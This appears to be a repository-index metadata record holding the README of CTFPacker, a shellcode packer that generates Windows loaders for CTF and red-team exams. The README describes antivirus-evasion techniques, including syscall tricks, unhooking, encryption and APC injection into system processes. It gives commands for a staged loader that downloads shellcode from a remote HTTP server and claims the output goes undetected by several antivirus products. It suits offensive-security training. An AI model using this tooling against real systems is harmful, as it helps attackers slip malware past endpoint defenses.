{"id":27599661,"url":"https://github.com/mochabyte0x/ctfpacker","last_synced_at":"2025-09-02T12:44:52.064Z","repository":{"id":283143945,"uuid":"950356524","full_name":"mochabyte0x/CTFPacker","owner":"mochabyte0x","description":"Cross platform (Linux / Windows) shellcode packer for CTFs and pentest / red team exams aiming for AV evasion !","archived":false,"fork":false,"pushed_at":"2025-08-21T17:17:00.000Z","size":215,"stargazers_count":72,"open_issues_count":0,"forks_count":11,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-08-21T19:58:12.410Z","etag":null,"topics":["antivirus-bypass","antivirus-evasion","evasion-techniques","loader-generator","packer","shellcode","shellcode-loader","shellcode-runner"],"latest_commit_sha":null,"homepage":"","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mochabyte0x.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2025-03-18T03:15:02.000Z","updated_at":"2025-08-21T17:17:04.000Z","dependencies_parsed_at":"2025-06-12T09:28:34.031Z","dependency_job_id":"75b742c5-1191-4e5d-9db8-645acd4792ee","html_url":"https://github.com/mochabyte0x/CTFPacker","commit_stats":null,"previous_names":["b0lg0r0v/ctfpacker","mochabyte0x/ctfpacker"],"tags_count":4,"template":false,"template_full_name":null,"purl":"pkg:github/mochabyte0x/CTFPacker","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mochabyte0x%2FCTFPacker","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mochabyte0x%2FCTFPacker/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mochabyte0x%2FCTFPacker/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mochabyte0x%2FCTFPacker/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mochabyte0x","download_url":"https://codeload.github.com/mochabyte0x/CTFPacker/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mochabyte0x%2FCTFPacker/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":273287590,"owners_count":25078570,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-09-02T02:00:09.530Z","response_time":77,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["antivirus-bypass","antivirus-evasion","evasion-techniques","loader-generator","packer","shellcode","shellcode-loader","shellcode-runner"],"created_at":"2025-04-22T15:40:54.484Z","updated_at":"2025-09-02T12:44:52.005Z","avatar_url":"https://github.com/mochabyte0x.png","language":"C","funding_links":[],"categories":[],"sub_categories":[],"readme":"# CTFPacker\n\n```\n ▄████▄ ▄▄▄█████▓ █████▒██▓███ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ██▀███ \n▒██▀ ▀█ ▓ ██▒ ▓▒▓██ ▒▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▓██ ▒ ██▒\n▒▓█ ▄ ▒ ▓██░ ▒░▒████ ░▓██░ ██▓▒▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ▓██ ░▄█ ▒\n▒▓▓▄ ▄██▒░ ▓██▓ ░ ░▓█▒ ░▒██▄█▓▒ ▒░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ▒██▀▀█▄ \n▒ ▓███▀ ░ ▒██▒ ░ ░▒█░ ▒██▒ ░ ░ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░██▓ ▒██▒\n░ ░▒ ▒ ░ ▒ ░░ ▒ ░ ▒▓▒░ ░ ░ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░░ ▒▓ ░▒▓░\n ░ ▒ ░ ░ ░▒ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░▒ ░ ▒░\n░ ░ ░ ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ \n░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ \n░ ░ \n```\n## Table-Of-Contents\n\n- [CTFPacker](#ctfpacker)\n * [Goal](#goal)\n * [General Information](#general-information)\n * [Evasion Features](#evasion-features)\n * [Installation](#installation)\n + [Makefile](#makefile)\n * [Usage](#usage)\n + [Format option](#format-option)\n + [Staged](#staged)\n + [Stageless](#stageless)\n + [Target Process Injection](#target-process-injection)\n * [Demo](#demo)\n * [To-Do](#to-do)\n * [Detections](#detections)\n * [Credits - References](#credits---references)\n\n## Goal\n\nThis repository has been created to facilitate AV evasion during CTFs and/or pentest \u0026 red team exams. The goal is to focus more on pwning rather than struggeling with evasion !\n\nCheck out my blog post for more infos: [Evade Modern AVs in 2025](https://mochabyte.xyz/posts/Evade-Modern-AVs-in-2025/)\n\n## General Information\n\n\u003e[!CAUTION]\n\u003eThis tool is designed for authorized operations only. I AM NOT RESPONSIBLE FOR YOUR ACTIONS. DON'T DO BAD STUFF.\n\n\u003e[!NOTE]\n\u003e- The techniques used in the loader are nothing new. The loader generated from this packer will probably NOT evade modern AVs / EDRs. Do not expect that or anything ground breaking.\n\u003e- Most of the evasion techniques used here are NOT from me. I just added a bunch of known stuff together and it is enough for CTFs !\n\u003e- Depending on the interest shown to this project, I might add some techniques from my own research and maybe expand/rewrite the packer entirely.\n\n## Evasion Features\n\n- Indirect Syscalls via Syswhispers (rewrote in NASM compatible assembly)\n- API Hashing\n- NTDLL unhooking via Known DLLs technique\n- Custom GetProcAddr \u0026 GetModuleHandle functions\n- Custom AES-128-CBC mode encryption \u0026 decryption\n- EarlyBird APC Injection\n- Possiblity to choose between staged or stageless loader\n- \"Polymorphic\" behavior with the `-s` argument\n\n## Installation\n\nDepending on your OS, the installation will slightly differ. In general, make sure you have the following stuff installed:\n\n- CLANG compiler\n- MinGW-w64 Toolchain\n- Make\n\nIf I am not mistaken, those are by default installed on KALI Linux. However, if you want to install them manually, this should do the trick:\n\n```bash\n# Assuming Debian based system\nsudo apt update\nsudo apt install clang pipx mingw-w64 make lld nasm osslsigncode\n\n# Verify installation\nclang --version\nmake --version\n\n# or\nclang -v\n\n# If this is the case, refer to the chapter \"Makefile\" to replace the compiler in the Makefile of the templates\n```\n\nIt's a bit of a different story on Windows. You need to install the MinGW-w64 toolchain by installing MSYS2 first.\n\n```powershell\n# Go there and install this\nhttps://www.msys2.org/\n\n# Then\npacman -Syu\npacman -S mingw-w64-x86_64-clang\n\n# Veryify installation\nx86_64-w64-mingw32-clang --version\n\n# Install make\npacman -S make\n\n# Verify installation\nmake --version\n```\n\nYou should also check under `C:\\msys64\\mingw64\\bin`. This is a common place where the toolchain is being installed.\n\nAfter the basis installation, don't forget to install the python requirements ! Otherwise the packer will not work :D !\n\n**Linux**:\n```bash\n# Via pipx (preferred way)\ncd CTFPacker\npython3 -m pipx install .\n# You can use ctfpacker globaly now\n\n# Via manual virtual environment\ncd CTFPacker\npython3 -m venv env\nsource env/bin/activate\npython3 -m pip install .\n\n# Once you're done using the tool\ndeactivate\n\n# Old fashion\ncd CTFPacker\npython3 -m pip install -r requirements.txt --break-system-packages\npython3 main.py -h\n```\n**Windows**:\n```powershell\n# Via pip\ncd CTFPacker\npython3 -m pip install .\n\n# Done ! :)\n```\n\n### Makefile\n\nYou should NOT modify the Makefile unless you know what you are doing ! BUT, there's one thing you should check BEFORE the python installation process. The first line of the Makefile indicates your compiler. Verify if the compiler matches with the one you installed earlier on your system. You can refer to the appropriate Makefile (windows / linux) in this repo.\n\n```makefile\n# Verify this line\nCLANG := clang\n```\n\nReplace it with the appropriate CLANG compiler\n\n```makefile\n# Example\nCLANG := x86_64-w64-mingw32-clang\n```\n\n## Usage\n\nGeneral usage:\n```\nusage: main.py [-h] {staged,stageless} ...\n\nCTFPacker\n\npositional arguments:\n {staged,stageless} Staged or Stageless Payloads\n staged Staged\n stageless Stageless\n\noptions:\n -h, --help show this help message and exit\n```\n\nStaged:\n\n```\nusage: main.py staged [-h] -p PAYLOAD [-f {EXE,DLL}] -i IP_ADDRESS -po PORT -pa PATH [-o OUTPUT] [-e] [-s] [-pfx PFX] [-pfx-pass PFX_PASSWORD]\n\noptions:\n -h, --help show this help message and exit\n -p PAYLOAD, --payload PAYLOAD\n Shellcode to be packed\n -f {EXE,DLL}, --format {EXE,DLL}\n Format of the output file (default: EXE).\n -i IP_ADDRESS, --ip-address IP_ADDRESS\n IP address from where your shellcode is gonna be fetched.\n -po PORT, --port PORT\n Port from where the HTTP connection is gonna fetch your shellcode.\n -pa PATH, --path PATH\n Path from where your shellcode uis gonna be fetched.\n -o OUTPUT, --output OUTPUT\n Output path where the shellcode is gonna be saved.\n -e, --encrypt Encrypt the shellcode via AES-128-CBC.\n -s, --scramble Scramble the loader's functions and variables.\n -pfx PFX, --pfx PFX Path to the PFX file for signing the loader.\n -pfx-pass PFX_PASSWORD, --pfx-password PFX_PASSWORD\n Password for the PFX file.\n\nExample usage: python main.py staged -p shellcode.bin -i 192.168.1.150 -po 8080 -pa '/shellcode.bin' -o shellcode -e -s -pfx cert.pfx -pfx-pass 'password'\n```\n\nStageless:\n\n```\nusage: main.py stageless [-h] -p PAYLOAD [-f {EXE,DLL}] [-e] [-s] [-pfx PFX] [-pfx-pass PFX_PASSWORD]\n\noptions:\n -h, --help show this help message and exit\n -p PAYLOAD, --payload PAYLOAD\n Shellcode to be packed\n -f {EXE,DLL}, --format {EXE,DLL}\n Format of the output file (default: EXE).\n -e, --encrypt Encrypt the shellcode via AES-128-CBC.\n -s, --scramble Scramble the loader's functions and variables.\n -pfx PFX, --pfx PFX Path to the PFX file for signing the loader.\n -pfx-pass PFX_PASSWORD, --pfx-password PFX_PASSWORD\n Password for the PFX file.\n\nExample usage: python main.py stageless -p shellcode.bin -o shellcode -e -s -pfx cert.pfx -pfx-pass 'password'\n```\n\n### Format option\n\nIn both cases, staged or stageless, you can choose whether to compile your loader as an EXE or a DLL. To compile it as a DLL, simply append `-f DLL`. By default, it compiles as an EXE, though you can also explicitly specify this using -f EXE (but you don't need to).\n\nThe DLL version exports a function called `ctf`. This is the function you need to call to start the exection. \n\n```powershell\nrundll32.exe ctfloader.dll,ctf\n```\n\n### Staged\n\nWhen using the staged \"mode\", the packer will generate you a .bin file named accordingly to your `-o` arg. With the `-pa` argument, you are actually telling the loader *where* on the websever (basically the path) it should search for that .bin file. So TLDR those two values should usually be the same.\n\nExample:\n\n```powershell\npython main.py staged -p \"C:\\Code\\CTFPacker\\calc.bin\" -i 192.168.2.121 -po 8080 -pa /shellcode.bin -o shellcode -s -pfx cert.pfx -pfx-pass Password\n\n\n\n ▄████▄ ▄▄▄█████▓ █████▒██▓███ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ██▀███\n▒██▀ ▀█ ▓ ██▒ ▓▒▓██ ▒▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▓██ ▒ ██▒\n▒▓█ ▄ ▒ ▓██░ ▒░▒████ ░▓██░ ██▓▒▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ▓██ ░▄█ ▒\n▒▓▓▄ ▄██▒░ ▓██▓ ░ ░▓█▒ ░▒██▄█▓▒ ▒░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ▒██▀▀█▄\n▒ ▓███▀ ░ ▒██▒ ░ ░▒█░ ▒██▒ ░ ░ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░██▓ ▒██▒\n░ ░▒ ▒ ░ ▒ ░░ ▒ ░ ▒▓▒░ ░ ░ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░░ ▒▓ ░▒▓░\n ░ ▒ ░ ░ ░▒ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░▒ ░ ▒░\n░ ░ ░ ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░\n░ ░ ░ ░░ ░ ░ ░ ░ ░ ░\n░ ░\n\n\n\n Author: mocha\n https://mochabyte.xyz\n\n[i] Staged Payload selected.\n[+] Starting the process...\n[i] Corresponding template selected..\n[+] Template files modified !\n[i] Encryption not selected.\n[+] Compiling the loader...\n[i] Scrambling selected.\n[+] Scrambling the loader...\n[+] Loader scrambled !\n[i] Signing selected.\n[+] Signing the loader...\nrm -f *.o *.obj ctfloader.exe\nC:\\msys64\\mingw64\\bin\\clang -static -O0 -Wall -w -c api_hashing.c -o api_hashing.o\nC:\\msys64\\mingw64\\bin\\clang -static -O0 -Wall -w -c download.c -o download.o\nC:\\msys64\\mingw64\\bin\\clang -static -O0 -Wall -w -c inject.c -o inject.o\nC:\\msys64\\mingw64\\bin\\clang -static -O0 -Wall -w -c main.c -o main.o\nC:\\msys64\\mingw64\\bin\\clang -static -O0 -Wall -w -c unhook.c -o unhook.o\nC:\\msys64\\mingw64\\bin\\clang -static -O0 -Wall -w -c whispers.c -o whispers.o\nnasm -f win64 whispers-asm.x64.asm -o whispers-asm.o\nC:\\msys64\\mingw64\\bin\\clang -static -O0 -Wall -w -o ctfloader.exe api_hashing.o download.o inject.o main.o unhook.o whispers.o whispers-asm.o -Wl,--disable-auto-import -s -lwinhttp -lntdll\nConnecting to http://timestamp.sectigo.com\nSucceeded\n[+] Loader signed !\n[+] DONE !\n```\n\nWith this command, your telling the loader to connect to the `192.168.2.121` IP, at port `8080` and download the `shellcode.bin` file. So you should serve this file via a webserver.\n\n```powershell\nC:\\Code\\CTFPacker\\CTF Packer\u003els\nshellcode.bin\n\nC:\\Code\\CTFPacker\\CTF Packer\u003epython -m http.server 8080\nServing HTTP on :: port 8080 (http://[::]:8080/) ...\n```\n\n### Stageless\n\nThis is fairly simple. The shellcode will be included into the loader. I recommend you to use the encryption arg `-e`. Otherwise the signature-based detection will likely catch it.\n\n```powershell\nC:\\Code\\CTFPacker\u003els\ncore custom_certs main.py requirements.txt templates\n\nC:\\Code\\CTFPacker\u003epython main.py stageless -p \"C:\\Code\\CTFPacker\\calc.bin\" -e -s\n\n\n\n ▄████▄ ▄▄▄█████▓ █████▒██▓███ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ██▀███\n▒██▀ ▀█ ▓ ██▒ ▓▒▓██ ▒▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▓██ ▒ ██▒\n▒▓█ ▄ ▒ ▓██░ ▒░▒████ ░▓██░ ██▓▒▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ▓██ ░▄█ ▒\n▒▓▓▄ ▄██▒░ ▓██▓ ░ ░▓█▒ ░▒██▄█▓▒ ▒░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ▒██▀▀█▄\n▒ ▓███▀ ░ ▒██▒ ░ ░▒█░ ▒██▒ ░ ░ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░██▓ ▒██▒\n░ ░▒ ▒ ░ ▒ ░░ ▒ ░ ▒▓▒░ ░ ░ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░░ ▒▓ ░▒▓░\n ░ ▒ ░ ░ ░▒ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░▒ ░ ▒░\n░ ░ ░ ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░\n░ ░ ░ ░░ ░ ░ ░ ░ ░ ░\n░ ░\n\n\n\n Author: mocha\n https://mochabyte.xyz\n\n[i] Stageless Payload selected.\n[+] Starting the process...\n[+] Template files modified !\n[i] Encryption selected.\n[+] Encrypting the payload...\n[+] Payload encrypted and saved into payload[] variable in main.c !\n[i] Scrambling selected.\n[+] Scrambling the loader...\n[+] Loader scrambled !\nrm -f *.o *.obj ctfloader.exe\nC:\\msys64\\mingw64\\bin\\clang -static -O0 -Wall -w -c api_hashing.c -o api_hashing.o\nC:\\msys64\\mingw64\\bin\\clang -static -O0 -Wall -w -c inject.c -o inject.o\nC:\\msys64\\mingw64\\bin\\clang -static -O0 -Wall -w -c main.c -o main.o\nC:\\msys64\\mingw64\\bin\\clang -static -O0 -Wall -w -c unhook.c -o unhook.o\nC:\\msys64\\mingw64\\bin\\clang -static -O0 -Wall -w -c whispers.c -o whispers.o\nnasm -f win64 whispers-asm.x64.asm -o whispers-asm.o\nC:\\msys64\\mingw64\\bin\\clang -static -O0 -Wall -w -o ctfloader.exe api_hashing.o inject.o main.o unhook.o whispers.o whispers-asm.o -Wl,--disable-auto-import -s -lwinhttp -lntdll\n[+] Loader compiled !\n[+] DONE !\n\nC:\\Code\\CTFPacker\u003els\ncore ctfloader.exe custom_certs main.py requirements.txt shellcode.bin templates\n```\n\n### Target Process Injection\n\nI won't go into detail about how the EarlyBird APC Injection technique works, but one thing you should know is that it needs to *create* a process. The current target process is `RuntimeBroker.exe`. IF (I encountered that in some HTB Pro Labs) `RuntimeBroker.exe` is NOT present on the system (for whatever reasons), you should change the source code and target another process.\n\nTo do that, you can navigate into the `main.c` file (staged or stageless) and modify this value at the top\n\n```c\n#define TARGET_PROCESS \"RuntimeBroker.exe\"\n```\n\nYou should choose a binary that is present in the `System32` directory. For example, this should also work:\n\n```c\n#define TARGET_PROCESS \"svchost.exe\"\n```\n\nI'll probably add some kind of argument in the future for you to choose between a few target processes.\n\n\u003e[!NOTE]\n\u003e Be aware that some processes will be easier to detect than others. In my experience, doing the APC Injection into `svchost` for example is more likely to be catched. \n\n## Demo\n\nhttps://github.com/user-attachments/assets/4aa56672-bcfb-424b-aa89-a919b514ae35\n\n## To-Do\n\n- [x] Maybe adding a setup.py file to install via pip / pipx\n- [ ] Other templates with different injection techniques\n- [ ] Adding AMSI / ETW bypass (depends on what injection technique I am going to put here)\n\n## Detections\n\n- Undetected on the latest Windows 11 Defender (2025-03-18, Version 1.425.89.0)\n- Undetected on Windows 10 Defender (2025-03-18, Version 1.425.90.0)\n- Undetected on the latest Sophos Home Premium (Version 2023.2.2.2)\n ![image](https://github.com/user-attachments/assets/54a5539c-8eb8-490e-a189-33fbf7be9867)\n- Undetected on the latest Kasperky Premium (20.06.2025)\n\n## Credits - References\n\nMost of the code is not from me. Here are the original authors:\n\n```\n@ Maldevacademy - https://maldevacademy.com\n@ SaadAhla - https://github.com/SaadAhla/ntdlll-unhooking-collection\n@ VX-Underground - https://github.com/vxunderground/VX-API/blob/main/VX-API/GetProcAddressDjb2.cpp\n@ klezVirus - https://github.com/klezVirus/SysWhispers3\n```\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmochabyte0x%2Fctfpacker","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmochabyte0x%2Fctfpacker","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmochabyte0x%2Fctfpacker/lists"}